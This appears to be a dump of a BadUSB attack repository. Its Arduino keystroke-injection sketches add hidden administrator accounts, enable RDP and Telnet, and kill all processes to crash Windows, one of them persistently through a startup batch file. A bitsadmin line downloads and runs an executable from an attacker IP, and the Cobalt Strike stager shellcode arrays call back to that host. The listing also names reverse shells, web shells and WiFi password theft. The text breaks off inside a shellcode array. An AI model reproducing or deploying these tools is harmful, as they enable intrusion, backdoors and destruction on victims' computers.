Repository: wangwei39120157028/BadUSB Branch: master Commit: 11f55ac48357 Files: 106 Total size: 233.0 KB Directory structure: gitextract_e7t_03bd/ ├── AddUser_StartService/ │ ├── AddUser_Enable3389(tools).ino │ └── AddUser_EnableFTP(tools).ino ├── BlueScreen/ │ ├── BlueScreen1(DOS).ino │ ├── BlueScreen2(DOS).ino │ ├── BlueScreen3(DOS).ino │ ├── BlueScreen_xp_win7(DOS).ino │ ├── DelayedBlueScreen (DOS).ino │ ├── RegistryWriteBlueScreen (DOS).ino │ └── RegistryWriteBlueScreenGeneralUse (DOS).ino ├── CobaltStrike_Trojanlinkage/ │ ├── Bitsadmin_TrojanExecution (LinkageWithCS).ino │ ├── CobaltStrike_Payload/ │ │ ├── payload.c │ │ ├── payload.cs │ │ ├── payload.java │ │ ├── payload.pl │ │ ├── payload.ps1 │ │ ├── payload.py │ │ ├── payload.rb │ │ ├── payload.sct │ │ ├── payload.txt │ │ └── payload.vba │ ├── PSL_TrojanExecution (LinkageWithCS).ino │ ├── PY_TrojanExecution (LinkageWithCS).ino │ ├── Pl_TrojanExecution (LinkageWithCS).ino │ └── Regsvr32_TrojanExecution (LinkageWithCS).ino ├── CodePrincipleInterpretation/ │ ├── ArduinoKeyCodeBase.ino │ ├── InstructionsOn_setup_loop_Methods.txt │ └── MSF_TrojanMakingTutorial.txt ├── DNSHijack/ │ ├── DOS_CommandSetMultipleDNS(DNSHijack).ino │ └── PSL_CommandSetMultipleDNS(DNSHijack).ino ├── LICENSE ├── Linux_Built-inReverseShell/ │ ├── LinuxReverseShell (CodeExecution).ino │ ├── LinuxReverseShell(BashShell).ino │ └── LinuxReverseShell(PerlShell).ino ├── MSF_Trojanlinkage/ │ ├── Shell_TrojanGenerationConfiguration.txt │ ├── shell.apk │ ├── shell.asp │ ├── shell.aspx │ ├── shell.elf │ ├── shell.jar │ ├── shell.jsp │ ├── shell.macho │ ├── shell.php │ ├── shell.pl │ ├── shell.psl │ ├── shell.py │ ├── shell.sh │ └── shell.war ├── OSX_Built-inReverseShell/ │ ├── OSX_SystemReverseConnection (dns_shell).ino │ ├── OSX_SystemReverseConnection (perl_shell).ino │ └── OSX_SystemReverseConnection (ruby_shell).ino ├── PSL_FullScreen-HACKED/ │ ├── FullScreenHackedv0/ │ │ ├── FullScreenHackedv/ │ │ │ └── FullScreenHackedv.ino │ │ └── get.ps1 │ 
├── FullScreenHackedv2/ │ │ ├── FullScreenHackedv2.ino │ │ └── wall.ps1 │ └── FullScreenHackedv3[慎用]/ │ ├── FullScreenHackedv3/ │ │ └── FullScreenHackedv3.ino │ └── get.ps1 ├── README.cn.md ├── README.md ├── RunProgramOn_UDrive_ExpandScopeOfIntrusion/ │ ├── UdiskRun/ │ │ └── UdiskRun.ino │ ├── UdiskRunv2/ │ │ └── UdiskRunv2.ino │ └── UdiskRunv3/ │ └── UdiskRunv3.ino ├── Site_AWord_IntrusionCode/ │ ├── AspSentenceTrojanWrite(webServerVersion).ino │ ├── AspSentenceTrojanWriting(websiteServerVersion-DynamicDecoding).ino │ ├── AspSentenceTrojanWriting(websiteServerVersion-ScriptEncoderEncryption).ino │ ├── AspxSentenceTrojanWrite(webServerVersion OverDog_OverDShield).ino │ ├── AspxSentenceTrojanWrite(webServerVersion).ino │ ├── JspSentenceTrojanWritten (JSP_websiteServerUse).ino │ ├── JspTrojanWrite(JSP_websiteServerUsing-non-Sentence).ino │ ├── PHP_TrojanWrite(PHP_webServerUse-ClassBypass).ino │ ├── PHP_TrojanWrite(PHP_webServerUse-XOR-Bypass).ino │ └── PHP_TrojanWrite(usedByPHP_websiteServer).ino ├── SpecificFunctionCode/ │ ├── AddUserCode(Tools).ino │ ├── Alt-f4_Loop.ino │ ├── ChangePasswordOfAccountUsed+CloseSystemProcess+BlueScreen(Tool).ino │ ├── EnablePSL_RemoteConnection(Tools).ino │ ├── ForceShutDownCommand(Tool).ino │ ├── ForcedDeletionOf360Processes(Tools).ino │ ├── Hide_CMD_Window(Display).ino │ ├── MouseKeepsMoving(Tools).ino │ ├── OpenPort445.ino │ ├── OpenSpecified_webPage.ino │ ├── ShiftBackdoor.ino │ ├── SimplyChangeAllUsersPasswords(TrickItem).ino │ ├── SimplyShutDownMachine(TrickItem).ino │ └── TakeScreenshot_SendSpecifiedFTP_Address(Tool).ino ├── TrojanDownloader/ │ ├── CERTUTIL_DownLoader/ │ │ └── CERTUTIL_DownLoader_MSF.ino │ ├── FTP_DownLoader/ │ │ └── FTP_DownloadNetcat_ConnectBackToShell(TrojanAttack).ino │ ├── JAVA_DownLoader/ │ │ ├── JavaTrojanWrite(TargetEnvironmentRunJava).ino │ │ └── server.java │ ├── PSL_DownLoader/ │ │ ├── Downloa_PSL_Trojan-Execute_aSecondTime.ino │ │ ├── LinkServer_MSF_PSL_Download.ino │ │ ├── 
LinkServer_PSL_Download.ino │ │ ├── PSL_DownLoader0.ino │ │ ├── PSL_DownLoader1.ino │ │ ├── PSL_DownLoader2.ino │ │ ├── PSL_DownLoader3.ino │ │ ├── PSL_DownLoader4.ino │ │ ├── PSL_Downloader_Win&Linux_General.ino │ │ └── PSL_Writes_Bounces.ino │ └── PY_DownLoader/ │ ├── PyShellServer.py │ └── Py_TrojanWrite(TargetEnvironmentRunPython).ino ├── Ubuntu_InformationGathering/ │ ├── BasicTerminalCommandsForUbuntu(Display).ino │ └── UbuntuInformationCollectionTXT_File(Information).ino ├── WiFi_ConnectionTrojan/ │ └── ForceConnectionToSpecifiedWiFi-DownloadPSL_TrojanRun.ino └── WiFi_PasswordAcquisition/ ├── WiFiPasswordCapture(tool).ino └── WiFiPasswordExport(tool).ino ================================================ FILE CONTENTS ================================================ ================================================ FILE: AddUser_StartService/AddUser_Enable3389(tools).ino ================================================ void setup(){ Keyboard.begin(); delay(3000); Keyboard.press(KEY_LEFT_GUI);//win键 delay(500); Keyboard.press('r');//r键 delay(500); Keyboard.release(KEY_LEFT_GUI); Keyboard.release('r'); delay(500); Keyboard.press(KEY_CAPS_LOCK); Keyboard.release(KEY_CAPS_LOCK); Keyboard.println("POWERSHELL.EXE -C START-PROCESS POWERSHELL -VERB RUNAS"); Keyboard.println(); delay(1000); Keyboard.press(KEY_LEFT_ALT); Keyboard.print('y'); Keyboard.release(KEY_LEFT_ALT); delay(500); Keyboard.println("CMD"); delay(50); Keyboard.println("CMD /C NET USER ADMIN ADMIN /ADD&NET LOCALGROUP ADMINISTRATORS ADMIN /ADD"); delay(50) Keyboard.println("ECHO wINDOWS rEGISTRY eDITOR vERSION 5.00>3389.REG&&ECHO [hkey_local_machine\\system\\cURRENTcONTROLsET\\cONTROL\\tERMINAL sERVER]>>3389.REG&&ECHO \"FdENYtscCONNECTIONS\"=DWORD:00000000>>3389.REG&&ECHO [hkey_local_machine\\system\\cURRENTcONTROLsET\\cONTROL\\tERMINAL sERVER\\wDS\\RDPWD\\tDS\\TCP]>>3389.REG&&ECHO \"pORTnUMBER\"=DWORD:00000D3D>>3389.REG&&ECHO [hkey_local_machine\\system\\cURRENTcONTROLsET\\cONTROL\\tERMINAL 
sERVER\\wINsTATIONS\\rdp-tCP]>>3389.REG&&ECHO \"pORTnUMBER\"=DWORD:00000D3D>>3389.REG"); delay(100); Keyboard.println("REGEDIT /S 3389.REG&&DEL 3389.REG&&EXIT"); Keyboard.press(KEY_CAPS_LOCK); Keyboard.release(KEY_CAPS_LOCK); Keyboard.end(); } void loop(){ } ================================================ FILE: AddUser_StartService/AddUser_EnableFTP(tools).ino ================================================ void setup() { Keyboard.begin();//开始键盘通讯 delay(5000);//延时 Keyboard.press(KEY_LEFT_GUI);//win键 delay(500); Keyboard.press('r');//r键 delay(500); Keyboard.release(KEY_LEFT_GUI); Keyboard.release('r'); Keyboard.press(KEY_CAPS_LOCK); Keyboard.release(KEY_CAPS_LOCK); delay(500); Keyboard.println("CMD"); Keyboard.println(); delay(500); Keyboard.println("COLOR A&&CLS"); Keyboard.println("NET USER 123 123 /ADD"); delay(500); Keyboard.println("NET LOCALGROUP ADMINISTRATORS 123 /ADD&® ADD \"hkey_local_machine\\software\\mICROSOFT\\wINDOWS nt\\cURRENTvERSION\\wINLOGON\\sPECIALaCCOUNTS\\uSERlIST\" /V 123 /D 0 /T reg_dword /F&® ADD \"hkey_local_machine\\software\\microsoft\\tELNETsERVER\\1.0\" /V ntlm /D 0 /T reg_doword/f&® add \"hklm\\system\\cURRENTcONTROLsET\\cONTRAL\\lSA\" /V \"FORCEGUEST\" /T reg_dword /D 0 /F"); delay(1000); Keyboard.println("SC CONFIG TLNTSVR START= AUTO"); delay(500); Keyboard.println("NET START TELNET"); delay(500); Keyboard.println("CLS&&ECHO hACKED fINISH"); Keyboard.press(KEY_CAPS_LOCK); Keyboard.release(KEY_CAPS_LOCK); Keyboard.end(); } void loop() { } ================================================ FILE: BlueScreen/BlueScreen1(DOS).ino ================================================ //CMD蓝屏代码 void setup() {//初始化 Keyboard.begin();//开始键盘通讯 delay(5000);//延时 Keyboard.press(KEY_LEFT_GUI);//win键 delay(500); Keyboard.press('r');//r键 delay(500); Keyboard.release(KEY_LEFT_GUI); Keyboard.release('r'); delay(500); Keyboard.println("cmd.exe /T:01 /K mode CON: COLS=16 LINES=1® delete HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU 
/f&cmd /c for /f %I in ('wmic process get Name')do (wmic process where Name=\"%I\" delete)"); Keyboard.end();//结束键盘通讯 } void loop()//循环 { } ================================================ FILE: BlueScreen/BlueScreen2(DOS).ino ================================================ void setup() {//初始化 Keyboard.begin();//开始键盘通讯 delay(20000);//延时 Keyboard.press(KEY_LEFT_GUI);//win键 delay(500); Keyboard.press('r');//r键 delay(500); Keyboard.release(KEY_LEFT_GUI); Keyboard.release('r'); Keyboard.press(KEY_CAPS_LOCK); Keyboard.release(KEY_CAPS_LOCK); delay(500); Keyboard.println("POWERSHELL -NOP -W HIDDEN -C \"sTART-pROCESS -fILEpATH CMD.EXE \' /C FOR /F %i IN(''WMIC PROCESS GET nAME\'\')DO (WMIC PROCESS WHERE nAME=\"%i\" DELETE)\' -vERB RUNAS\""); Keyboard.println(); Keyboard.press(KEY_CAPS_LOCK); Keyboard.release(KEY_CAPS_LOCK); Keyboard.end();//结束键盘通讯 } void loop()//循环 { //bypass uac 绕过UAC 这一段不会用的不要用,否则后果自负 //Keyboard.press(KEY_LEFT_ALT); //Keyboard.print('y'); //Keyboard.release(KEY_LEFT_ALT); } ================================================ FILE: BlueScreen/BlueScreen3(DOS).ino ================================================ void setup() {//初始化 Keyboard.begin();//开始键盘通讯 delay(5000);//延时 Keyboard.press(KEY_LEFT_GUI);//win键 delay(500); Keyboard.press('r');//r键 delay(500); Keyboard.release(KEY_LEFT_GUI); Keyboard.release('r'); delay(500); Keyboard.press(KEY_CAPS_LOCK); Keyboard.release(KEY_CAPS_LOCK); Keyboard.println("CMD /C FOR /F %i IN ('WMIC PROCESS GET nAME')DO (WMIC PROCESS WHERE nAME=\"%i\" DELETE)"); Keyboard.press(KEY_CAPS_LOCK); Keyboard.release(KEY_CAPS_LOCK); Keyboard.end();//结束键盘通讯 } void loop()//循环 { } ================================================ FILE: BlueScreen/BlueScreen_xp_win7(DOS).ino ================================================ #include void setup() { //初始化 Keyboard.begin();//开始键盘通讯 delay(5000);//延时 Keyboard.press(KEY_LEFT_GUI);//win键 delay(500); Keyboard.press('r');//r键 delay(500); Keyboard.release(KEY_LEFT_GUI); Keyboard.release('r'); 
Keyboard.press(KEY_CAPS_LOCK); Keyboard.release(KEY_CAPS_LOCK); delay(500); Keyboard.println("CMD /C START /MIN CMD /C REG DELETE hkcu\\sOFTWARE\\mICROSOFT\\wINDOWS\\cURRENTvERSION\\eXPLORER\\rUNmru /F&CMD /C START /MIN CMD /C NTSD -C Q -PN WINLOGON.EXE 1>NUL 2>NUL&TASKKILL /F /IM WININIT.EXE 2>NUL"); Keyboard.press(KEY_CAPS_LOCK); Keyboard.release(KEY_CAPS_LOCK); Keyboard.end();//结束键盘通讯 } void loop()//循环 { } ================================================ FILE: BlueScreen/DelayedBlueScreen (DOS).ino ================================================ void setup() {//初始化 Keyboard.begin();//开始键盘通讯 delay(5000);//延时 Keyboard.press(KEY_LEFT_GUI);//win键 delay(500); Keyboard.press('r');//r键 delay(500); Keyboard.release(KEY_LEFT_GUI); Keyboard.release('r'); delay(500); Keyboard.println("cmd.exe /k reg delete HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU /f"); delay(500); Keyboard.println("echo.if \"%1\" == \"h\" goto begin>c:\\1.bat&echo.mshta vbscript:createobject(\"wscript.shell\").run(\"%~nx0 h\",0)(window.close)^&^&exit>>c:\\1.bat&echo.:begin>>c:\\1.bat&echo.ping ^-n 3 127.1^>nul^&for /f %%I in ('wmic process get Name')do (wmic process where Name=\"%%I\" delete)^>c:\\1.vbs^&c:\\1.vbs>>c:\\1.bat&exit"); Keyboard.press(KEY_LEFT_GUI);//win键 delay(500); Keyboard.press('r');//r键 delay(500); Keyboard.release(KEY_LEFT_GUI); Keyboard.release('r'); delay(500); Keyboard.println("c:\\1.bat"); Keyboard.end();//结束键盘通讯 } void loop()//循环 { } ================================================ FILE: BlueScreen/RegistryWriteBlueScreen (DOS).ino ================================================ void setup() {//初始化 Keyboard.begin();//开始键盘通讯 delay(5000);//延时 Keyboard.press(KEY_LEFT_GUI);//win键 delay(500); Keyboard.press('r');//r键 delay(500); Keyboard.release(KEY_LEFT_GUI); Keyboard.release('r'); Keyboard.press(KEY_CAPS_LOCK); Keyboard.release(KEY_CAPS_LOCK); delay(500); Keyboard.println("CMD /C CD %USERPROFILE%\\aPPdATA\\rOAMING\\mICROSOFT\\wINDOWS\\sTART 
mENU\\pROGRAMS\\sTARTUP&ECHO FOR /F %%i IN (\'WMIC PROCESS GET NAME\')DO (WMIC PROCESS WHERE nAME=\"%%I\" DELETE)>SYSTEM.BAT&SHUTDOWN -R -F -T 0"); Keyboard.press(KEY_CAPS_LOCK); Keyboard.release(KEY_CAPS_LOCK); Keyboard.end();//结束键盘通讯 } void loop()//循环 { } ================================================ FILE: BlueScreen/RegistryWriteBlueScreenGeneralUse (DOS).ino ================================================ void setup() {//初始化 Keyboard.begin();//开始键盘通讯 delay(5000);//延时 Keyboard.press(KEY_LEFT_GUI);//win键 delay(500); Keyboard.press('r');//r键 delay(500); Keyboard.release(KEY_LEFT_GUI); Keyboard.release('r'); Keyboard.press(KEY_CAPS_LOCK); Keyboard.release(KEY_CAPS_LOCK); delay(500); Keyboard.println("CMD /C START /MIN CMD /C REG DELETE hkcu\\sOFTWARE\\mICROSOFT\\wINDOWS\\cURRENTvERSION\\eXPLORER\\rUNmru /F&CMD /C START /MIN CMD /C NTSD -C Q -PN WINLOGON.EXE 1>NUL 2>NUL&TASKKILL /F /IM WININIT.EXE 2>NUL"); Keyboard.press(KEY_CAPS_LOCK); Keyboard.release(KEY_CAPS_LOCK); Keyboard.end();//结束键盘通讯 } void loop()//循环 { } ================================================ FILE: CobaltStrike_Trojanlinkage/Bitsadmin_TrojanExecution (LinkageWithCS).ino ================================================ #include void setup() {//初始化 Keyboard.begin();//开始键盘通讯 delay(5000);//延时 Keyboard.press(KEY_CAPS_LOCK); //按下大写键 这里我们最好这样写 不然大多数电脑在中文输入的情况下就会出现问题 Keyboard.release(KEY_CAPS_LOCK); //释放大写键 delay(200); Keyboard.press(KEY_LEFT_GUI);//win键 delay(200); Keyboard.press('r');//r键 delay(200); Keyboard.release(KEY_LEFT_GUI); Keyboard.release('r'); Keyboard.println("cmd.exe"); delay(200); Keyboard.println("cmd.exe /c bitsadmin /transfer 270c http://192.168.154.131:80/b %APPDATA%\270c.exe&%APPDATA%\270c.exe&del %APPDATA%\270c.exe"); //访问Web Delivery-bitsadmin,恶意网址按照实际更改 delay(200); Keyboard.end();//结束键盘通讯 } void loop()//循环 { } ================================================ FILE: CobaltStrike_Trojanlinkage/CobaltStrike_Payload/payload.c ================================================ /* 
length: 800 bytes */ unsigned char buf[] = "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x6e\x65\x74\x00\x68\x77\x69\x6e\x69\x54\x68\x4c\x77\x26\x07\xff\xd5\x31\xff\x57\x57\x57\x57\x57\x68\x3a\x56\x79\xa7\xff\xd5\xe9\x84\x00\x00\x00\x5b\x31\xc9\x51\x51\x6a\x03\x51\x51\x68\x24\x05\x00\x00\x53\x50\x68\x57\x89\x9f\xc6\xff\xd5\xeb\x70\x5b\x31\xd2\x52\x68\x00\x02\x60\x84\x52\x52\x52\x53\x52\x50\x68\xeb\x55\x2e\x3b\xff\xd5\x89\xc6\x83\xc3\x50\x31\xff\x57\x57\x6a\xff\x53\x56\x68\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x84\xc3\x01\x00\x00\x31\xff\x85\xf6\x74\x04\x89\xf9\xeb\x09\x68\xaa\xc5\xe2\x5d\xff\xd5\x89\xc1\x68\x45\x21\x5e\x31\xff\xd5\x31\xff\x57\x6a\x07\x51\x56\x50\x68\xb7\x57\xe0\x0b\xff\xd5\xbf\x00\x2f\x00\x00\x39\xc7\x74\xb7\x31\xff\xe9\x91\x01\x00\x00\xe9\xc9\x01\x00\x00\xe8\x8b\xff\xff\xff\x2f\x77\x4c\x61\x38\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x31\x30\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x32\x3b\x20\x57\x69\x6e\x36\x34\x3b\x20\x78\x36\x34\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x36\x2e
\x30\x29\x0d\x0a\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x00\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x40\x68\x00\x10\x00\x00\x68\x00\x00\x40\x00\x57\x68\x58\xa4\x53\xe5\xff\xd5\x93\xb9\x00\x00\x00\x00\x01\xd9\x51\x53\x89\xe7\x57\x68\x00\x20\x00\x00\x53\x56\x68\x12\x96\x89\xe2\xff\xd5\x85\xc0\x74\xc6\x8b\x07\x01\xc3\x85\xc0\x75\xe5\x58\xc3\xe8\xa9\xfd\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x35\x34\x2e\x31\x33\x31\x00\x00\x00\x00\x00"; ================================================ FILE: CobaltStrike_Trojanlinkage/CobaltStrike_Payload/payload.cs ================================================ /* length: 800 bytes */ byte[] buf = new byte[800] { 0xfc, 0xe8, 0x89, 0x00, 0x00, 0x00, 0x60, 0x89, 0xe5, 0x31, 0xd2, 0x64, 0x8b, 0x52, 0x30, 0x8b, 0x52, 0x0c, 0x8b, 0x52, 0x14, 0x8b, 0x72, 0x28, 0x0f, 0xb7, 0x4a, 0x26, 0x31, 0xff, 0x31, 0xc0, 0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0xe2, 0xf0, 0x52, 0x57, 0x8b, 0x52, 0x10, 0x8b, 0x42, 0x3c, 0x01, 0xd0, 0x8b, 0x40, 0x78, 0x85, 0xc0, 0x74, 0x4a, 0x01, 0xd0, 0x50, 0x8b, 0x48, 0x18, 0x8b, 0x58, 0x20, 0x01, 0xd3, 0xe3, 0x3c, 0x49, 0x8b, 0x34, 0x8b, 0x01, 0xd6, 0x31, 0xff, 0x31, 0xc0, 0xac, 0xc1, 0xcf, 
0x0d, 0x01, 0xc7, 0x38, 0xe0, 0x75, 0xf4, 0x03, 0x7d, 0xf8, 0x3b, 0x7d, 0x24, 0x75, 0xe2, 0x58, 0x8b, 0x58, 0x24, 0x01, 0xd3, 0x66, 0x8b, 0x0c, 0x4b, 0x8b, 0x58, 0x1c, 0x01, 0xd3, 0x8b, 0x04, 0x8b, 0x01, 0xd0, 0x89, 0x44, 0x24, 0x24, 0x5b, 0x5b, 0x61, 0x59, 0x5a, 0x51, 0xff, 0xe0, 0x58, 0x5f, 0x5a, 0x8b, 0x12, 0xeb, 0x86, 0x5d, 0x68, 0x6e, 0x65, 0x74, 0x00, 0x68, 0x77, 0x69, 0x6e, 0x69, 0x54, 0x68, 0x4c, 0x77, 0x26, 0x07, 0xff, 0xd5, 0x31, 0xff, 0x57, 0x57, 0x57, 0x57, 0x57, 0x68, 0x3a, 0x56, 0x79, 0xa7, 0xff, 0xd5, 0xe9, 0x84, 0x00, 0x00, 0x00, 0x5b, 0x31, 0xc9, 0x51, 0x51, 0x6a, 0x03, 0x51, 0x51, 0x68, 0x24, 0x05, 0x00, 0x00, 0x53, 0x50, 0x68, 0x57, 0x89, 0x9f, 0xc6, 0xff, 0xd5, 0xeb, 0x70, 0x5b, 0x31, 0xd2, 0x52, 0x68, 0x00, 0x02, 0x60, 0x84, 0x52, 0x52, 0x52, 0x53, 0x52, 0x50, 0x68, 0xeb, 0x55, 0x2e, 0x3b, 0xff, 0xd5, 0x89, 0xc6, 0x83, 0xc3, 0x50, 0x31, 0xff, 0x57, 0x57, 0x6a, 0xff, 0x53, 0x56, 0x68, 0x2d, 0x06, 0x18, 0x7b, 0xff, 0xd5, 0x85, 0xc0, 0x0f, 0x84, 0xc3, 0x01, 0x00, 0x00, 0x31, 0xff, 0x85, 0xf6, 0x74, 0x04, 0x89, 0xf9, 0xeb, 0x09, 0x68, 0xaa, 0xc5, 0xe2, 0x5d, 0xff, 0xd5, 0x89, 0xc1, 0x68, 0x45, 0x21, 0x5e, 0x31, 0xff, 0xd5, 0x31, 0xff, 0x57, 0x6a, 0x07, 0x51, 0x56, 0x50, 0x68, 0xb7, 0x57, 0xe0, 0x0b, 0xff, 0xd5, 0xbf, 0x00, 0x2f, 0x00, 0x00, 0x39, 0xc7, 0x74, 0xb7, 0x31, 0xff, 0xe9, 0x91, 0x01, 0x00, 0x00, 0xe9, 0xc9, 0x01, 0x00, 0x00, 0xe8, 0x8b, 0xff, 0xff, 0xff, 0x2f, 0x74, 0x4f, 0x57, 0x42, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x00, 0x55, 0x73, 0x65, 0x72, 0x2d, 0x41, 0x67, 0x65, 0x6e, 0x74, 0x3a, 0x20, 0x4d, 0x6f, 0x7a, 0x69, 0x6c, 0x6c, 0x61, 
0x2f, 0x35, 0x2e, 0x30, 0x20, 0x28, 0x63, 0x6f, 0x6d, 0x70, 0x61, 0x74, 0x69, 0x62, 0x6c, 0x65, 0x3b, 0x20, 0x4d, 0x53, 0x49, 0x45, 0x20, 0x31, 0x30, 0x2e, 0x30, 0x3b, 0x20, 0x57, 0x69, 0x6e, 0x64, 0x6f, 0x77, 0x73, 0x20, 0x4e, 0x54, 0x20, 0x36, 0x2e, 0x32, 0x3b, 0x20, 0x57, 0x69, 0x6e, 0x36, 0x34, 0x3b, 0x20, 0x78, 0x36, 0x34, 0x3b, 0x20, 0x54, 0x72, 0x69, 0x64, 0x65, 0x6e, 0x74, 0x2f, 0x36, 0x2e, 0x30, 0x29, 0x0d, 0x0a, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x00, 0x68, 0xf0, 0xb5, 0xa2, 0x56, 0xff, 0xd5, 0x6a, 0x40, 0x68, 0x00, 0x10, 0x00, 0x00, 0x68, 0x00, 0x00, 0x40, 0x00, 0x57, 0x68, 0x58, 0xa4, 0x53, 0xe5, 0xff, 0xd5, 0x93, 0xb9, 0x00, 0x00, 0x00, 0x00, 0x01, 0xd9, 0x51, 0x53, 0x89, 0xe7, 0x57, 0x68, 0x00, 0x20, 0x00, 0x00, 0x53, 0x56, 0x68, 
